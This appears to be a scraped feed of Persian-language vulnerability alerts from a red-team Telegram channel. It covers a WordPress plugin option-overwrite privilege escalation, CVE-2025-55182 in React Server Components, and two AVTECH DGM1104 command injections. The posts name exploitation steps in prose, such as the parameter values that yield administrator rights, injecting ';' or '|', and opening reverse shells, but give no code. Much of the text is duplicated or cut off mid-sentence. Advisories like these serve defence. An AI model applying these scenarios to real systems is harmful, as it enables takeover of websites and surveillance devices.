Frontend Admin استفاده کرده و یک فرم عمومی (مانند فرم ویرایش پروفایل یا فرم تماس) در دسترس عموم قرار دارد.۲. مهاجم یک درخواست وب دستکاریشده (Crafted Request) به سمت سرور ارسال میکند. در این درخواست، پارامترهایی با نامهای مشابه تنظیمات وردپرس مانند
users_can_register با مقدار 1 و default_role با مقدار administrator گنجانده شده است.۳. به دلیل ضعف امنیتی در افزونه، این درخواست بدون بررسی سطح دسترسی پردازش شده و مقادیر ارسالشده توسط مهاجم مستقیماً در جدول تنظیمات وردپرس (
wp_options) بازنویسی میشود.۴. اکنون، قابلیت ثبتنام در سایت فعال شده و نقش پیشفرض برای هر کاربر جدید، "مدیر کل" است. مهاجم به سادگی به صفحه ثبتنام سایت مراجعه کرده، یک حساب کاربری جدید ایجاد میکند و بلافاصله به پیشخوان وردپرس با بالاترین سطح دسترسی وارد میشود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13390
🔴 Risk Level: CRITICAL (Score: 10.0)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 10.0)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-55182
🔴 Risk Level: CRITICAL (Score: 10.0)
📝 شرح آسیبپذیری:
یک آسیبپذیری بسیار خطرناک از نوع اجرای کد از راه دور پیش از احراز هویت (Pre-Authentication RCE) با شناسه
این ضعف امنیتی ناشی از deserialization ناامن دادههای ورودی (payloads) از درخواستهای HTTP به نقاط پایانی (endpoints) مربوط به Server Functionها میباشد. مهاجم میتواند بدون نیاز به هیچگونه اعتبارسنجی، از این آسیبپذیری بهرهبرداری کند.
نسخههای تحت تأثیر:
پکیجهای آسیبپذیر:
💥 تأثیر:
یک مهاجم از راه دور و بدون نیاز به احراز هویت، قادر خواهد بود تا کد دلخواه خود را بر روی سرور آسیبپذیر اجرا کند. این امر میتواند منجر به کنترل کامل سرور (Full System Compromise)، سرقت اطلاعات حساس، اختلال در سرویسدهی و یا استفاده از سرور به عنوان نقطهای برای حملات بیشتر به زیرساخت داخلی سازمان شود.
🎭 سناریو حمله:
مهاجم یک درخواست HTTP حاوی یک payload مخرب و با ساختار ویژه را به یکی از نقاط پایانی (endpoints) که از Server Functionها در یک وب اپلیکیشن آسیبپذیر استفاده میکند، ارسال مینماید. سرور، به دلیل پردازش و deserialization ناامن این محتوا، کد تعبیهشده توسط مهاجم را با سطح دسترسی پروسه وب اپلیکیشن اجرا میکند و کنترل اجرای برنامه را به دست مهاجم میسپارد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 10.0)
📝 شرح آسیبپذیری:
یک آسیبپذیری بسیار خطرناک از نوع اجرای کد از راه دور پیش از احراز هویت (Pre-Authentication RCE) با شناسه
CVE-2025-55182 در کامپوننتهای سرور React شناسایی شده است.این ضعف امنیتی ناشی از deserialization ناامن دادههای ورودی (payloads) از درخواستهای HTTP به نقاط پایانی (endpoints) مربوط به Server Functionها میباشد. مهاجم میتواند بدون نیاز به هیچگونه اعتبارسنجی، از این آسیبپذیری بهرهبرداری کند.
نسخههای تحت تأثیر:
19.0.0, 19.1.0, 19.1.1, 19.2.0پکیجهای آسیبپذیر:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpack💥 تأثیر:
یک مهاجم از راه دور و بدون نیاز به احراز هویت، قادر خواهد بود تا کد دلخواه خود را بر روی سرور آسیبپذیر اجرا کند. این امر میتواند منجر به کنترل کامل سرور (Full System Compromise)، سرقت اطلاعات حساس، اختلال در سرویسدهی و یا استفاده از سرور به عنوان نقطهای برای حملات بیشتر به زیرساخت داخلی سازمان شود.
🎭 سناریو حمله:
مهاجم یک درخواست HTTP حاوی یک payload مخرب و با ساختار ویژه را به یکی از نقاط پایانی (endpoints) که از Server Functionها در یک وب اپلیکیشن آسیبپذیر استفاده میکند، ارسال مینماید. سرور، به دلیل پردازش و deserialization ناامن این محتوا، کد تعبیهشده توسط مهاجم را با سطح دسترسی پروسه وب اپلیکیشن اجرا میکند و کنترل اجرای برنامه را به دست مهاجم میسپارد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-57198
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل و گزارش آسیبپذیری CVE-2025-57198
---
آسیبپذیری:
یک آسیبپذیری از نوع تزریق دستور (Command Injection) با شناسه
این ضعف امنیتی در اندپوینت
تأثیر:
مهاجم میتواند با بهرهبرداری موفق از این آسیبپذیری، کنترل کامل دستگاه را به دست آورد. این امر منجر به پیامدهای جدی زیر میشود:
- دسترسی و سرقت فیدهای ویدیویی زنده و ضبطشده.
- از کار انداختن کامل سیستم نظارتی.
- استفاده از دستگاه به عنوان نقطهای برای نفوذ به سایر سیستمهای موجود در شبکه داخلی (Lateral Movement).
- نصب بدافزار یا درب پشتی (Backdoor) برای حفظ دسترسی پایدار.
سناریوی حمله:
۱. مهاجم با استفاده از اطلاعات کاربری معتبر (مانند اطلاعات پیشفرض، ضعیف یا سرقتشده) به پنل وب دستگاه وارد میشود.
۲. سپس یک درخواست دستکاریشده به آدرس
۳. در این درخواست، دستورات مخرب سیستمعامل (مانند ایجاد یک reverse shell برای برقراری ارتباط با سرور مهاجم) را در یکی از پارامترهای ورودی تزریق میکند.
۴. سرور بدون اعتبارسنجی کافی، ورودی مخرب را به همراه دستورات قانونی اجرا کرده و در نتیجه، مهاجم به اجرای کد از راه دور (RCE) دست مییابد و کنترل کامل دستگاه را در اختیار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل و گزارش آسیبپذیری CVE-2025-57198
---
آسیبپذیری:
یک آسیبپذیری از نوع تزریق دستور (Command Injection) با شناسه
CVE-2025-57198 در دستگاههای شرکت AVTECH SECURITY مدل DGM1104 با فریمور FullImg-1015-1004-1006-1003 شناسایی شده است.این ضعف امنیتی در اندپوینت
Machine.cgi قرار دارد و به یک مهاجم که قبلاً به سیستم دسترسی پیدا کرده (Authenticated)، اجازه میدهد تا با ارسال ورودیهای دستکاریشده، دستورات دلخواه خود را بر روی سیستمعامل دستگاه اجرا کند.تأثیر:
مهاجم میتواند با بهرهبرداری موفق از این آسیبپذیری، کنترل کامل دستگاه را به دست آورد. این امر منجر به پیامدهای جدی زیر میشود:
- دسترسی و سرقت فیدهای ویدیویی زنده و ضبطشده.
- از کار انداختن کامل سیستم نظارتی.
- استفاده از دستگاه به عنوان نقطهای برای نفوذ به سایر سیستمهای موجود در شبکه داخلی (Lateral Movement).
- نصب بدافزار یا درب پشتی (Backdoor) برای حفظ دسترسی پایدار.
سناریوی حمله:
۱. مهاجم با استفاده از اطلاعات کاربری معتبر (مانند اطلاعات پیشفرض، ضعیف یا سرقتشده) به پنل وب دستگاه وارد میشود.
۲. سپس یک درخواست دستکاریشده به آدرس
/cgi-bin/Machine.cgi ارسال میکند.۳. در این درخواست، دستورات مخرب سیستمعامل (مانند ایجاد یک reverse shell برای برقراری ارتباط با سرور مهاجم) را در یکی از پارامترهای ورودی تزریق میکند.
۴. سرور بدون اعتبارسنجی کافی، ورودی مخرب را به همراه دستورات قانونی اجرا کرده و در نتیجه، مهاجم به اجرای کد از راه دور (RCE) دست مییابد و کنترل کامل دستگاه را در اختیار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-57199
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل و گزارش آسیبپذیری
---
🔎 شرح آسیبپذیری:
یک آسیبپذیری حیاتی با شناسه
این آسیبپذیری از نوع تزریق دستور پس از احراز هویت (Authenticated Command Injection) در فایل باینری
⚠️ تأثیر:
تأثیر این آسیبپذیری بسیار بالا است. مهاجمی که با موفقیت از این ضعف امنیتی بهرهبرداری کند، میتواند کنترل کامل دستگاه را در دست بگیرد.
این سطح از دسترسی به مهاجم اجازه میدهد تا اطلاعات حساس را به سرقت ببرد، بدافزار یا درهای پشتی (Backdoors) نصب کند، عملکرد دستگاه را مختل سازد و یا از آن به عنوان نقطهای برای حمله به سایر دستگاههای موجود در همان شبکه استفاده نماید.
🎬 سناریوی حمله:
یک مهاجم ابتدا از طریق روشهایی مانند فیشینگ، حملات Brute-force یا استفاده از اعتبارنامههای پیشفرض، به پنل مدیریتی دستگاه دسترسی پیدا میکند.
پس از ورود به سیستم، مهاجم یک درخواست دستکاریشده به بخشی که از باینری
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل و گزارش آسیبپذیری
CVE-2025-57199---
🔎 شرح آسیبپذیری:
یک آسیبپذیری حیاتی با شناسه
CVE-2025-57199 در دستگاههای AVTECH SECURITY Corporation DGM1104 با فریمور نسخه FullImg-1015-1004-1006-1003 شناسایی شده است.این آسیبپذیری از نوع تزریق دستور پس از احراز هویت (Authenticated Command Injection) در فایل باینری
NetFailDetectD میباشد. این بدان معناست که یک مهاجم معتبر (که قبلاً وارد سیستم شده) میتواند با ارسال ورودیهای دستکاریشده، دستورات دلخواه خود را در سطح سیستمعامل دستگاه اجرا نماید.⚠️ تأثیر:
تأثیر این آسیبپذیری بسیار بالا است. مهاجمی که با موفقیت از این ضعف امنیتی بهرهبرداری کند، میتواند کنترل کامل دستگاه را در دست بگیرد.
این سطح از دسترسی به مهاجم اجازه میدهد تا اطلاعات حساس را به سرقت ببرد، بدافزار یا درهای پشتی (Backdoors) نصب کند، عملکرد دستگاه را مختل سازد و یا از آن به عنوان نقطهای برای حمله به سایر دستگاههای موجود در همان شبکه استفاده نماید.
🎬 سناریوی حمله:
یک مهاجم ابتدا از طریق روشهایی مانند فیشینگ، حملات Brute-force یا استفاده از اعتبارنامههای پیشفرض، به پنل مدیریتی دستگاه دسترسی پیدا میکند.
پس از ورود به سیستم، مهاجم یک درخواست دستکاریشده به بخشی که از باینری
NetFailDetectD استفاده میکند، ارسال مینماید. این درخواست حاوی کاراکترهای ویژهای مانند ; یا | است که به او اجازه میدهد دستور دلخواه خود را به ورودی اصلی اضافه کند. برای مثال، مهاجم میتواند دستوری برای ایجاد یک اتصال معکوس (Reverse Shell) به سرور خود اجرا کرده و بدین ترتیب کنترل کامل دستگاه را از راه دور به دست بگیرد.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal